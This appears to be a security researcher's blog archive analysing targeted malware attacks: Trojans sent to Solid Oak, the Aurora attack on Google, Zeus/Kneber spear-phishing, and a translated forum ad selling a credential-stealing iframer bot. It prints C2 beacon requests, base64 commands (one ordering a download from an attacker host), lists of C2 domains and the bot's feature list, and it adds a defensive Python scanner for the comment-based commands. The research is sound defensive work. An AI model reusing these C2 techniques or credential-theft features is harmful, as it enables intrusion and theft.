Posts categorized “Uncategorized”

Malware Attacks on Solid Oak After Dispute with Greendam



A while back I posted an analysis of attacks on Solid Oak (the makers of CyberSitter) after a dispute with a Chinese firm that produced GreenDam over stolen code. Rob Lemos covered the story and also revealed that the law firm representing Solid Oak subsequently came under a similar targeted malware attack. The story has surfaced again, this time in connection with APT. I’ve reposted the original from malwarelab.org below.

Malware Attacks on Solid Oak After Dispute with Greendam

By Nart Villeneuve

After researchers discovered that portions of China’s Green Dam filtering software were stolen from CyberSitter, an American filtering product, the company that produces CyberSitter, Solid Oak, came under a targeted malware attack. This short post from the Malware Lab (www.malwarelab.org) analyzes two samples from the attacks.

Findings:

  • The delivery component of the attacks specifically targeted Solid Oak. In one case the attackers registered and used a Gmail account that was a misspelling of a Solid Oak employee’s name and used it to send an email about a contextually relevant topic.
  • These targeted emails contained (or linked to) malicious files that, if opened, caused the target’s computer to become infected with a Trojan Horse program.
  • In both cases the Trojan connects to (related) web servers but requests seemingly legitimate files. However, at certain times the attackers insert commands into these files inside HTML comment tags.

Background

In June 2009, it was reported that the Chinese government was requiring the installation of filtering software, known as Green Dam, on all personal computers sold in China [1]. Researchers from the University of Michigan analyzed Green Dam and discovered security vulnerabilities that would allow malicious attackers to take control of any computer running Green Dam.

In addition, they found that portions of Green Dam’s block lists were taken from a U.S. company, Solid Oak, that produces a filtering product called CyberSitter, and that the image filtering component was taken from OpenCV, an open source project [2]. Bryan Zhang, the founder of Jin Hui, the company that created Green Dam, denied that Green Dam contained stolen code and stated that it was “impossible” [3]. Solid Oak released a report detailing the incident and is reportedly seeking legal action against PC manufacturers that are shipping computers with Green Dam installed [4].

On June 25, 2009 reports emerged stating that Solid Oak was under attack. In addition to “server problems”, company executives began receiving suspicious emails [5].

The following is an analysis of samples of malware sent to Solid Oak.

Sample 1

On June 25, 2009 an email message was sent to Brian Milburn, the CEO of Solid Oak, from “jenna.dipaquale@gmail.com”; Jenna DiPasquale (note the missing “s”) is the head of public relations for Solid Oak.

Date: Thu, 25 Jun 2009 05:49:18 -0400
Subject: This is the Jinhui Computer System Engineering Inc’s report about China’s Green Dam Youth Escort screening software.
From: Jenna DiPaquale
To: bmilburn@solidoak.com

This is the Jinhui Computer System Engineering Inc’s report about
China’s Green Dam Youth Escort screening software.
www.civis.com/jinhui_report.zip

The file, jinhui_report.zip, was no longer available at www.civis.com at the time of analysis, so the sample that Solid Oak provided was used. The zip file contains an executable:

Jinhui_Computer_System_Engineering_Inc_the_Chinese_government_officials_report.exe

However, Windows hides known file extensions by default, a “feature” that caused the malicious executable to appear as if it were a directory/folder [6].

When the malicious file is run (the user thinks he or she is opening a directory), a directory with the same name is created and the contents of that directory (a Word document, Jinhuisays.doc) are displayed to the user while malicious software is dropped on the system. The malicious file issues a connection to http://www.chuckfaganco.com/docs/rmscpt5.htm (76.76.146.89) (see Threat Expert for an automated report [7]).

The User-Agent contains some interesting characters:

GET /docs/rmscpt5.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32) z3?xwc.InfoPath.so
Host: www.chuckfaganco.com

The response contains a “command” in an HTML comment tag:

<!-- {/*jgJ-.J} -->

This command has since been removed from the requested page.

After opening the malware, a document is displayed, Jinhuisays.doc, but it does not contain malware [8].

Sample 2

The second sample is a PowerPoint file, “Solid Oak seteps up China’net nappy.ppt”, that exploits a vulnerability in PowerPoint to drop a malicious file (for automated reports see Threat Expert and VirusTotal [9]).

The malware drops a file, “Net110..exe”, which issues a connection to http://www.parkerwood.com/help/403-3.htm (69.20.4.85) (for an automated report see Threat Expert [10]).

Unlike Sample 1, the User-Agent does not contain interesting characters:

GET /help/403-3.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: www.parkerwood.com

This command appears as an HTML comment in the response:

<!-- czox -->

base64 decode = s:1

It eventually changed to:

<!-- czozMDA= -->

base64 decode = s:300

Other commands were seen on www.parkerwood.com by accessing a variety of other pages throughout the site, such as /help/403-1.htm, /help/403-2.htm, /help/403-4.htm and /help/403-7.htm:

<!-- czo0 -->

base64 decode = s:4

<!-- czoyNDA= -->

base64 decode = s:240

<!-- ZDpodHRwOi8vd3d3LnBhcmtlcndvb2QuY29tL2ltYWdlcy90b3AuZ2lm -->

base64 decode = d:http://www.parkerwood.com/images/top.gif

<!-- {/*jgJ-nJ} -->
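A small scanner for the comment-tag C2 channel described above, written as an added example for this post (it is not code from the original analysis or from the malware): it pulls HTML comments out of fetched page bodies, base64-decodes the ones that decode cleanly, splits them into the letter:argument form seen in the decodes above, and separately flags the odd trailer in Sample 1’s User-Agent. The sample response bodies are constructed around the comment values reported here; reading s: as a sleep interval and d: as a download is an assumption inferred from the post, not something the post confirms.

```python
import base64
import binascii
import re

# Constructed sample HTTP response bodies (not captures from the post). The
# HTML-comment payloads are the ones the post reports seeing on
# www.parkerwood.com and www.chuckfaganco.com; the surrounding HTML is made up.
SAMPLE_RESPONSES = {
    "/help/403-3.htm": "<html><body><p>403</p><!-- czozMDA= --></body></html>",
    "/help/403-1.htm": ("<html><!-- czo0 --><body>ok</body>"
                        "<!-- ZDpodHRwOi8vd3d3LnBhcmtlcndvb2QuY29tL2ltYWdlcy90b3AuZ2lm -->"
                        "</html>"),
    "/docs/rmscpt5.htm": "<html><body><!-- {/*jgJ-.J} --><!-- copyright 2009 --></body></html>",
}

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
# Every decoded command in the post has the shape <letter>:<argument>
# (s:300, d:http://...); that is the only grammar the post shows.
COMMAND_RE = re.compile(r"^([a-z]):(.*)$", re.DOTALL)
# A genuine "Mozilla/4.0 (compatible; MSIE ...)" User-Agent ends at the
# closing parenthesis; Sample 1 carried extra characters after it.
MSIE_UA_RE = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE [^)]*\)(.*)$")


def try_base64(text):
    """Return the decoded string if text is valid base64 that decodes to
    printable ASCII, otherwise None (ordinary comments fail this test)."""
    stripped = text.strip()
    if not stripped or len(stripped) % 4 != 0:
        return None
    try:
        raw = base64.b64decode(stripped, validate=True)
        decoded = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None


def extract_commands(body):
    """Return (raw_comment, decoded, command, argument) for every HTML comment
    in body; the last three are None when the comment is not a base64
    command, as for the {/*jgJ-.J} marker seen on www.chuckfaganco.com."""
    results = []
    for m in COMMENT_RE.finditer(body):
        raw = m.group(1).strip()
        decoded = try_base64(raw)
        cmd = arg = None
        if decoded is not None:
            cm = COMMAND_RE.match(decoded)
            if cm:
                cmd, arg = cm.group(1), cm.group(2)
        results.append((raw, decoded, cmd, arg))
    return results


def describe(cmd, arg):
    """Human-readable reading of a command. The meanings are inferred from the
    post, not documented: s:N preceded the beacon going quiet (treating N as
    a sleep interval is an assumption) and d:URL names a file to fetch."""
    if cmd == "s":
        return "sleep/interval %s" % arg
    if cmd == "d":
        return "download %s" % arg
    return "unknown command %r with argument %r" % (cmd, arg)


def scan_responses(responses):
    """Scan {path: body} and return {path: [(cmd, arg), ...]} for the pages
    that carried at least one base64 command, i.e. the pages of an otherwise
    legitimate-looking site that are acting as the C2 channel."""
    hits = {}
    for path, body in responses.items():
        cmds = [(c, a) for _, _, c, a in extract_commands(body) if c is not None]
        if cmds:
            hits[path] = cmds
    return hits


def msie_ua_trailer(user_agent):
    """Return any text trailing the closing parenthesis of an MSIE-style
    User-Agent (the post's Sample 1 had 'z3?xwc.InfoPath.so' there), or None
    when the UA does not match that shape or has no trailer."""
    m = MSIE_UA_RE.match(user_agent)
    if not m:
        return None
    trailer = m.group(1).strip()
    return trailer or None


if __name__ == "__main__":
    for path, cmds in scan_responses(SAMPLE_RESPONSES).items():
        for cmd, arg in cmds:
            print("%s: %s" % (path, describe(cmd, arg)))
    for ua in ("Mozilla/4.0 (compatible; MSIE 8.0; Win32) z3?xwc.InfoPath.so",
               "Mozilla/4.0 (compatible; MSIE 7.0;)"):
        print("%r -> trailer %r" % (ua, msie_ua_trailer(ua)))
```

Run against proxy or sandbox captures of the pages a beacon requests, the same functions separate the command-bearing responses from the benign 403/404 pages the post describes.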

After dropping the Trojan, a PowerPoint presentation opens.

One interesting behaviour of this particular case is that the page(s) that the malware connects to change quite frequently. At times, commands are inserted into the page in HTML comment tags only to be completely removed at a later time, sometimes within several hours of first appearing. These commands also change over time. In addition, sometimes pages are no longer present (404) but re-appear at a later time. At other times, all the pages are restricted (403).

Sample 2 connected to http://www.parkerwood.com/help/403-3.htm every 10 minutes. These connections were monitored starting at Fri Jul 10 14:50:01 2009 and after finally receiving a command Sat Jul 11 22:20:47 2009 the malware did not issue any further connections (the monitoring stopped at Wed Jul 15 08:11:44 2009).

Fri Jul 10 14:50:01 2009 – 403 Forbidden No Command
Fri Jul 10 23:10:16 2009 – 404 Not Found No Command
Sat Jul 11 22:10:46 2009 – 403 Forbidden No Command
Sat Jul 11 22:20:47 2009 – 200 OK <!-- czozMDA= --> (base64 decode = s:300)

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

[1] http://www.nytimes.com/2009/06/09/world/asia/09china.html
[2] http://www.cse.umich.edu/~jhalderm/pub/gd/
[3] http://online.wsj.com/article/SB124486910756712249.html
[4] http://www.cybersitter.com/gdcs.pdf and http://www.pcworld.com/businesscenter/article/167842/suit_over_chinas_web_filter_to_target_lenovo_acer_sony.html
[5] http://government.zdnet.com/?p=5034, http://government.zdnet.com/?p=5049, http://www.informationweek.com/story/showArticle.jhtml?articleID=218101882
[6] http://www.f-secure.com/weblog/archives/00001675.html
[7] http://threatexpert.com/report.aspx?md5=783c50f221c339f244ac68b38fcd30af
[8] http://www.virustotal.com/analisis/33e5495969fd497c439d18e7ea3976845c5454b378764a7b5dd887eef6bc8a9e-1247083107
[9] http://www.threatexpert.com/report.aspx?md5=86f7cc8f65522a9d7eed8adf22bb9772, http://www.virustotal.com/analisis/d1a5e159bfcdf3a22abf521d91bc83dd70ac3b1155c46eac5106450df17eb56b-1247073429
[10] http://www.threatexpert.com/report.aspx?md5=1778671314196147402789eeb0c6d89c

The Aurora Mess



The data about Aurora has always felt just a little off to me. Maybe it’s that everyone writing about it just has their own piece of the puzzle to analyse, without the detail required to accurately link the pieces together.

When it comes to the command and control infrastructure, maybe it’s that some obfuscated the domain names while others published them, but with a domain on the blog post that’s not in the technical write-up. Maybe it is that some have significantly bigger lists than others (that include duplicates as well as the root domain for a dynamic DNS provider that hands out sub-domains).

Maybe it is that some name domains that hosted the exploit but do not provide details on the C&Cs that compromised hosts check in with. Maybe the difference between the long lists and short lists is that some are including “copycats” — sites that host the IE exploit. Since “Aurora” is now being used to refer interchangeably to the specific attack on Google, the 0day vulnerability in Internet Explorer (that was apparently used), and the malware that was apparently dropped by the exploit (Hydraq), it is difficult to get a handle on exactly what is what.

Google says the attacks were “highly sophisticated and targeted” (as does McAfee, Mandiant, and iDefense) while Damballa says that it was the work of amateurs, Dancho Danchev says that “[i]t’s in fact [an] average team” and Mikko Hypponen says “[t]his wasn’t in my opinion ground-breaking as an attack. We see this fairly regularly.” OK, well, that’s quite the continuum of “sophistication.” Back to that in a bit.

Attribution? The New York Times reported that the attacks were traced to two schools in China: Shanghai Jiaotong University and the Lanxiang Vocational School. While some have drawn links between these schools and the Chinese military, others cast doubt on it. The Financial Times reports that “a freelance security consultant in his 30s” in China wrote (part of) the Internet Explorer exploit but “is not a full-time government worker, did not launch the attack, and in fact would prefer not be used in such offensive efforts.” Hmm. OK. Mandiant indicated that the quality of the exploit points toward some kind of relationship with the Chinese state, while iDefense, looking at the command and control infrastructure, pretty unambiguously states that the Chinese state was behind the attacks whether or not “amateurs” were used.

So here we are at the crossroads of the exploit, the malware, and the command and control infrastructure. And as Richard Bejtlich points out there’s more to it than just the technical aspects of malware, there is, as Mike Cloppert describes, a range of indicators that allow one to characterize the adversary behind the attacks. Clearly, most of us relying on public sources do not have a sufficient level of detailed information to analyse the attack on Google with such depth.

This brings me back to the Damballa report. I really liked this report because it focused on the command and control infrastructure, it was based on interesting data collected via passive DNS, and it included many interesting conclusions and enough detail to begin connecting their data with other publicly available data. In fact, one of the most interesting observations for me was evidence from the DNS resolutions that Google China was compromised first, followed by Google in Mountain View some 17 hours later. Still, there are parts of the report that are confusing to me.

The Damballa report starts by looking at “five CnC domain names associated with the Aurora botnet” that were publicly disclosed; however, these domain names are not explicitly stated in the report. The most seemingly authoritative list, from Symantec, for example, lists 7 domains. The starting point appears to be “blog1.servebeer.com”. This one is common to all lists (except Symantec’s technical write-up). The domain servebeer.com is a Dynamic DNS service offered by No-IP that allows people to register sub-domains such as “blog1.” Based on factors such as “DDNS credentials” Damballa linked the following domains together (four of which are not disclosed).

CnC_Domain.1
CnC_Domain.2
CnC_Domain.3
CnC_Domain.4
blog1.servebeer.com

At some point each of the 5 domains above pointed at at least one of the “IP addresses associated with two of the CnC servers used during the Aurora attack.” The IP’s were not disclosed. Therefore, I am not entirely sure of how the next group of domain names are linked.

baltika1.servebeer.com
m7been.zapto.org
miecros.info
mcsmc.org
yahoo.blogdns.net
filoups.info
google.homeunix.com

While the last 2 domains (filoups.info and google.homeunix.com) appear on the US CERT list of “Aurora” domains, the first 5 domains (baltika1.servebeer.com, m7been.zapto.org, miecros.info, mcsmc.org, and yahoo.blogdns.net) do not.

Damballa then links this second group to “two distinct families of Fake AV Alert / Scareware: Login Software 2009 and Microsoft Antispyware Services.”

Fake AV Alert / Scareware
mcsmc.org
micronetsys.org
mnprfix.cn
filoups.info
miecros.info

Fake Microsoft Antispyware
ec2-79-125-21-42.eu-west-1.compute.amazonaws.com
ip-173-201-21-161.ip.secureserver.net
inekoncuba.inekon.co.cu
google.homeunix.com
yahoo.blogdns.net
voanews.ath.cx
ymail.ath.cx

So, filoups.info links the “Fake AV Alert / Scareware” to the US CERT list of “Aurora” domains and google.homeunix.com links the “Fake Microsoft Antispyware” to the US CERT list of “Aurora” domains. Both appear in Damballa’s second cluster (which has an unclear relationship with the first cluster).

Using the Damballa list along with samples from ThreatExpert I compiled a list that included a few additional domain names. I included domain names that the individual piece of malware requested that had similar paths to those identified by Damballa and excluded those that appeared to be other malware or SEO URLs.

For example, one sample contains google.homeunix.com, yahoo.blogdns.net, tyuqwer.blogdns.com, and tyuqwer.dyndns.org. The domains google.homeunix.com and tyuqwer.dyndns.org appear on the US CERT list, yahoo.blogdns.net appears on the Damballa list and tyuqwer.blogdns.com appears on neither. Another sample contains google.homeunix.com, tyuqwer.dyndns.org, blogspot.blogsite.org and voanews.ath.cx. All of these domains appear on the US CERT list; google.homeunix.com and voanews.ath.cx also appear on the Damballa list.

The next grouping largely focuses on “mcsmc.org” and the domain names that appear with it and request similar URL paths but are not in the Damballa report.

virtualmits.com
syswa.cn
thcway.info
searchnix.info
wscntgy.com
google-analitics.in
licagreem.in
jusched.in

The relationships between the domains can be built out further, especially if we include common IP addresses. I think this indicates that there are a variety of conclusions being drawn based on data that comes bundled with a variety of assumptions. For example, is the sample detailed by Symantec the same — as opposed to similar to — the one used in the attack on Google? How were these “master” lists — such as the one by US CERT — created? How were these domains bundled together?

In the Damballa report in particular there are a few additional assumptions that I am not entirely sure of. First, I’m not sure that DDNS == amateur. Many of the targeted attacks on civil society and human rights groups I’ve looked at used DDNS. And while many DDNS providers do cooperate with the security industry and law enforcement, the ones in China (like 3322.org) don’t. Moreover, I’m not sure that “amateur” necessarily excludes state involvement — even governments can engage in behaviour that would be considered amateurish. And would you want to tip off state involvement by being uber3l33t? The logic just starts to become circular after a while, especially if you only focus on the technical aspects.

I mean, if we take Google at their word and believe that “a primary goal of the attackers was accessing the Gmail accounts of Chinese human rights activists” how do we explain the connection to (probably Eastern European) SEO and related common malware?

Even if we assume that the “master” list is accurate, Damballa does raise some alternative explanations for the association between the two:

  • it is possible that two different groups purchased the services of the same crimeware group (probably the same people behind Operation Aurora) to distribute and manage their malware family. Or the crimeware group rented out different variants of the same malware to different groups with different intentions.
  • There is no natural progression seen between the two families. Usually malware writers evolve in both technology and protection of their creation but these two families did not show any related evolution. The malware families appear to exist independently, and then become superseded by Trojan.Hydraq.

The relationship between crimeware — or common botnet operators/kits — and targeted malware attacks in order to extract sensitive data (some might call this espionage) is something I tried to explore in “The “Kneber” Botnet, Spear Phishing Attacks and Crimeware.” Again, given the lack of precise data I don’t claim to know what’s going on in the Google case — in fact, I may have just made it worse with this post. But if we accept the links that Damballa has found to be accurate, it does raise the important issue of the relationship between crimeware and espionage.

But, maybe, we’re jumping to conclusions based on faulty assumptions. I just don’t know. It is still a mess.

The “Kneber” Botnet, Spear Phishing Attacks and Crimeware



After I received an email from Jeff Carr warning about a spoofed email containing malware, I asked Jeff to send it along. It turns out that the attackers also used portions of a blog post by Brian Krebs as a lure. What is interesting is that the attack targeted .mil and .gov email addresses using text from Carr and Krebs about an earlier attack targeting .mil and .gov email addresses. A quick analysis of the sample indicated that it was Zeus and was beaconing to a known Zeus command and control server. However, the interesting part, for me, is what happened after getting compromised by Zeus, and I have to really thank Jeff for passing along the email because it led me to this stuff.

Around the same time news of the Kneber botnet broke and Netwitness linked the two attacks together. While much of the coverage of Kneber was hype-filled, the actual report by Netwitness is excellent and you can get a hype-free overview by Alex Cox, the guy who discovered it, here. The response of some of the AV vendors has been troubling. Essentially some said that this is nothing new, it’s just Zeus, and that there’s long been AV protection for Zeus. Netwitness responded stating that many AV’s actually did not detect the samples they analyzed.

For the sample I analyzed, antivirus coverage was 18/41 on VirusTotal.

The main issue for me was the use of Zeus to drop malware that focused on document removal and that it was used in conjunction with spear phishing attacks on .mil/gov email addresses. This second drop was 5/41 on Virustotal.

From the data it seems like the attackers were capturing whatever they could, not retrieving specific documents. That said, they managed to compromise the types of people they appeared to be after (in terms of who the phishing mails were sent to) and in a few cases managed to get some very interesting documents.

I think the broader issue is what Brian Krebs alluded to in the comments section of his blog – and Netwitness indicated this as well — that is, if we believe that these crimeware types are squeezing all the monetary value they can out of their operations, what would they do with the type of information that has intelligence value but is not easily monetized in a traditional sense? And how better to obscure attribution than to use existing crimeware infrastructure for what appears to be more espionage than traditional crime?

I am keeping these as open questions because I am not sure how strong the connection is and tend to be cautious on these issues. But I do think it is an interesting case.

Read the full post here and here.

UPDATE: I’ve copied the report into this post.

Decrypting the Google statement



There have been many articles saying that Google is pulling out of China. Well, that’s not exactly what Google said.

Here is exactly what Google stated:

We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all. We recognize that this may well mean having to shut down Google.cn, and potentially our offices in China.

Google is not leaving China. At least not yet.

Look at what was actually said:

1) Google is no longer willing to censor, so Google will 2) engage in discussion with the Chinese government 3) in order to operate an uncensored search engine within the law.

Law is the key word here. China’s Foreign Ministry spokesperson, Jiang Wu, stated:

China welcomes international Internet companies to conduct business within the country according to law

The question is, what law says that Google cannot index the web site of the BBC news? Anyone know?

In 2006 when Google started censoring google.cn in China I asked:

What specific law or court order is being complied with in China?

It is 2010, still no answer.

I think it is a reasonable question for Google to ask.

Chatter…



This post is my analysis of publicly available information on the attack against Google. I think that Google linked to my blog and the GhostNet report because of similarities in methods, not because the two cases are linked. This post combines my analysis of Google’s statement, media reports and my experience with other attacks — that doesn’t mean that this is exactly what happened in the attack on Google.

There’s been a lot of chatter about how Google and 30+ other companies were compromised. Adobe has issued a statement saying that they too were compromised, but they still won’t say if the attacks are in fact linked. Yahoo! stated that they were “aligned with Google” and it is now being reported that Yahoo! was among the other unnamed victims in the attack.

The timing of the compromise is interesting because it coincides with a 0day vulnerability in Adobe Reader. It has been suggested that this was the attack vector. The coincidence is interesting and I think that this claim is fairly credible.

UPDATE: McAfee reports that the compromise was an Internet Explorer 0day:

Our investigation has shown that Internet Explorer is vulnerable on all of Microsoft’s most recent operating system releases, including Windows 7. Still, so far the attacks we’ve seen using this vector have been focused on Internet Explorer 6. Microsoft has been working with us on this matter and we thank them for their collaboration.

While we have identified the Internet Explorer vulnerability as one of the vectors of attack in this incident, many of these targeted attacks often involve a cocktail of zero-day vulnerabilities combined with sophisticated social engineering scenarios. So there very well may be other attack vectors that are not known to us at this time. That said, contrary to some reports our findings to date have not shown a vulnerability in Adobe Reader being a factor in these attacks.

iDefense has stated that they were able to investigate these attacks since some of their customers were also hit:

IDefense was called in to help some of the victim companies that Google had uncovered. According to Jellenc, the hackers sent targeted e-mail messages to victims that contained a malicious attachment containing what’s known as a zero-day attack. These attacks are typically not detected by antivirus vendors because they exploit a previously unknown software bug.

“There is an attack exploiting a zero-day vulnerability in one of the major document types,” Jellenc said. “They infect whichever users they can, and leverage any contact information or any access information on the victim’s computer to misrepresent themselves as that victim.” The goal is to “infect someone with administrative access to the systems that hold the intellectual property that they’re trying to obtain,” he added.

The attack vector is very similar to GhostNet, but, it is a very common form of attack. Mikko Hypponen (who is awesome) told the BBC:

“This wasn’t in my opinion ground-breaking as an attack. We see this fairly regularly,” said Mikko Hypponen, of security firm F-Secure.

“Most companies just never go public,” he added.

“Human-rights activists are the biggest target,” said Mr Hypponen. “Everyone from Freedom for Tibet to Falun Gong supporters and those involved in Liberation of Taiwan are hit.”

I tend to agree. It is not the method of attack that is the story here; it’s the high profile of the victims and the public disclosure by Google, as well as Google’s decision to challenge China’s censorship, that have made it so interesting. Really, we investigate these kinds of attacks (usually on human rights activists) all the time.

In short, a user receives an email, possibly appearing to be from someone that they know who is a real person within his/her organization, with some text — sometimes specific, sometimes generic — that urges the user to open an attachment (usually a PDF or Word document, but other document types are also common) or visit a web site. If the user opens that attachment with a vulnerable version of Adobe Reader or Microsoft Office their computer will be compromised. The antivirus detection for these documents is usually relatively low and if the exploit is a 0day — an exploit for which there is no fix from the vendor available — the chances of compromise are very good.

After the user’s computer is compromised it “checks in” with a command and control server (C&C). These days it is most common for this check in to be an HTTP connection — it often looks like just another visit to a website — in which the compromised computer sends some information, usually an IP address and operating system etc… — and receives a command which it then executes. From there the attacker has full control of the system. The attacker can steal documents, email etc… force the compromised computer to download additional malware and use your infected computer as a mechanism to exploit your contacts or other computers on your network.

One of the things I like to track closely is the network infrastructure of the attackers — the location of their command and control servers as well as the mechanism of communication and other properties of the malware that allows for seemingly disparate attacks to be linked together. There has been some information published about the command and control servers used in the Google attack. James Mulvenon, who really knows his stuff, stated that the C&C’s were in Taiwan, the drop site for stolen stuff was on a US IP:

The attacks appear to have been launched from at least six Internet addresses located in Taiwan, which is a common strategy used by Chinese hackers to mask their origin, said James Mulvenon, director of the Center for Intelligence Research and Analysis at Defense Group Inc. a national-security firm.

They also hijacked the Internet address of a San Antonio-based firm, Rackspace, which is one of the largest Internet-hosting companies in the U.S. They siphoned off the stolen data from Google and other companies to the San Antonio site before sending it overseas, Mr. Mulvenon said. A Rackspace official said, “A server at Rackspace was compromised, disabled, and we actively assisted in the investigation of the cyber attack, fully cooperating with all affected parties.”

In addition, a dynamic DNS service was reportedly used:

iDefense obtained samples of the malicious code used in the July attack and the more recent one and found that although the malware was different in the two attacks, the programs both communicated with similar command-and-control servers. The servers each used the HomeLinux DynamicDNS to change their IP address, and both currently pointed to IP addresses belonging to a subset of addresses owned by Linode, a US-based company that offers Virtual Private Server hosting.

“The IP addresses in question are . . . six IP addresses apart from each other,” iDefense said in its statement. “Considering this proximity, it is possible that the two attacks are one and the same, and that the organizations targeted in the [recent] Silicon Valley attacks have been compromised since July.”

UPDATE: Apparently one of the pieces of malware used was the Hydraq Trojan.

And what did the attackers steal? Google stated that there was “theft of intellectual property”, some suggest that the attackers stole source code:

But according to iDefense, whose customers include some of the 33 companies that were hacked, the attacks were well targeted and “unusually sophisticated” and aimed at grabbing source code from several hi-tech companies based in Silicon Valley as well as financial institutions and defense contractors.

However, Google stated that the “primary goal of the attackers was accessing the Gmail accounts of Chinese human rights activists” and that the attack was partially successful:

Only two Gmail accounts appear to have been accessed, and that activity was limited to account information (such as the date the account was created) and subject line, rather than the content of emails themselves.

Others state that Google’s internal intercept systems were attacked:

That’s because they apparently were able to access a system used to help Google comply with search warrants by providing data on Google users, said a source familiar with the situation, who spoke on condition of anonymity because he was not authorized to speak with the press. “Right before Christmas, it was, ‘Holy s***, this malware is accessing the internal intercept [systems],’” he said.

Now some people have come forward, a Tibetan activist for example, saying that their email accounts had been breached.

Who is behind the attacks? Google didn’t really say who was behind the attacks. iDefense, who may be overreaching here, stated that it was the “Chinese state”:

“We confirmed with some clients and partners of ours in the defense contracting community that the IP addresses used to launch the attacks are known to be associated with previous attacks from groups that are either directly employed agents of the Chinese state or amateur hackers that are proxies for them that have attacked other U.S. companies in the past.”

In fact, attribution in these sorts of attacks is very difficult. Often people rely on the geolocation of an IP address — that’s not good enough. In this case the C&Cs were apparently in Taiwan and the drop site in the US. What does that tell us? Through piecing together seemingly disparate bits of information over time it is possible to make an educated guess. What makes the process difficult and tenuous is that the attackers might be quite different persons from those who ultimately exploit the data the attackers gather. It is the interpretation of the political dimensions of the attack that leads to a determination of who might ultimately have benefited the most from the attack, not technical evidence. Therefore there is room for a lot of uncertainty.

Google’s New Approach



Google has just announced that there were successful attacks against their infrastructure resulting in the theft of intellectual property. Google traced the attacks to China and, although the attribution regarding the Chinese government is unclear, Google also discovered that the attackers attempted to compromise the Gmail accounts of Chinese human rights activists.

But the most interesting result was due to the combination of attacks, surveillance and censorship Google has decided to reassess their operations in China:

These attacks and the surveillance they have uncovered–combined with the attempts over the past year to further limit free speech on the web–have led us to conclude that we should review the feasibility of our business operations in China. We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all. We recognize that this may well mean having to shut down Google.cn, and potentially our offices in China.

The decision to review our business operations in China has been incredibly hard, and we know that it will have potentially far-reaching consequences. We want to make clear that this move was driven by our executives in the United States, without the knowledge or involvement of our employees in China who have worked incredibly hard to make Google.cn the success it is today. We are committed to working responsibly to resolve the very difficult issues raised.

Wow.

The connection between censorship, surveillance and attacks is the key. Censorship, such as the blocking of web sites, is fairly crude but effective when combined with targeted surveillance and attacks. While many, especially the technically savvy, can circumvent China’s filtering system, the “GFW”, using tools such as Psiphon and Tor, most Chinese citizens do not. The GFW doesn’t have to be 100% technically effective; it just has to serve as a reminder to those in China of what content is acceptable and what should be avoided. The objective is to influence behaviour toward self-censorship, so that most will not actively seek out banned information or the means to bypass the controls and access it.

This nexus of censorship, surveillance and malware attacks is the key to China’s information control policies. It is not just about the GFW. Internet users in China face complex threats that depend heavily on additional factors, such as involvement in political activities, and that involve targeted attacks and surveillance. China chooses when, where and how to exercise this granular control.

The InfoWar Monitor — which is a partnership between the Citizen Lab, Munk Centre for International Studies, University of Toronto and The SecDev Group (and SecDev.cyber which focuses on Internet threats) — has been focusing on these threats. For example, in a report “Breaching Trust: An analysis of surveillance and security practices on China’s TOM-Skype platform” we documented how Tom-Skype (the Chinese version of Skype) was censoring and capturing politically sensitive content. In “Tracking GhostNet: Investigating a Cyber Espionage Network” we documented targeted malware attacks that compromised over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs.

Google’s decision to reassess its operations in China is courageous. I strongly hope that Microsoft, Yahoo! and others follow Google’s lead, as, to their credit, they have done in the past. In “Search Monitor Project: Toward a Measure of Transparency” I compared the censorship practices of Google, Yahoo! and Microsoft as well as the domestic Chinese search engine Baidu and found that all followed Google’s lead to some extent by at least disclosing their censorship practices to their users. I hope that they stand by Google.

China, the ball is in your court.

Malware Market



It’s no surprise that there is a malware market, an ecosystem of buyers, sellers and middlemen known as “guarantors”. In a very interesting post, “The botnet ecosystem“, Vitaly Kamluk explains the way in which this system works. There is a malware market in which malicious code and services are exchanged with the help of trusted third parties — usually administrators of popular forums. In addition, compromised hosts and stolen credentials are also exchanged.

Here’s a microcosm of this ecosystem that I stumbled upon recently. A member of a forum (forum.inattack.ru) called “Brainy” posts an ad for a bot that steals FTP and HTTPS credentials and uses the stolen FTP accounts to inject iframes into the sites they give access to:


Here’s an English rendering of the post by “brainy” (the original is in Russian underground slang):

[BrainyFramer], bot: iframer / grabber / sniffer
20.11.2009, 2:06

I offer you an iframer / sniffer / grabber bot of my own making, [BrainyFramer].
This bot will be a good assistant to the many who do this professionally.

Features:
- Grabber for 21 FTP clients
- FTP sniffer covering 37 different clients (web browsers included)
- HTTPS form grabber for IE (5, 6, 7, 8) and FF. Sniffs hosting-panel logins (~120 different hosts)
- FTP iframer: your FTP list is processed by the bots in a distributed way. High speed. Frames the accounts the bot has sniffed. Removes other people’s code.

Admin panel in action:
[screenshot]

Pushed out via a loader to 100 machines
Stats: check-in rate 75%
Detection of the test build: 4 AVs.

____________________________

Price per build: 400 WMZ
____________________________

[!] Free updates for everyone who has bought.
[!] Link changes are free.
[!] Questions and setup are free too :)
[!] The software gets detected. I don’t crypt it. I’ll give you the contact of someone who does.
[!] Does not work on Vista and Windows 7.
————————————————– ———–

Answers to frequently asked questions:
——
Q: Does it get detected? Does it get through a firewall?
A: The software works in the context of web browsers and the system’s FTP client. If those applications have network access, the bot will work.
—–
Q: Why is there so little in the FTP log?
A: It depends on your loads. From 1K purchased loads you usually get 20-100 accounts. 0.5-1K FTPs from 1K purchased loads is a myth.
If you buy doorway traffic for the keyword “download ftp client” then you’ll understand that there will be more FTPs in the log.
—–
Q: What about trading it for ...?
A: No, I don’t need anything except money.
—–
Q: Is it possible to test it?
A: I have neither the desire nor the time to make a test for someone. The software has been checked by more than just me.
—–

ICQ> 3_5266891_7


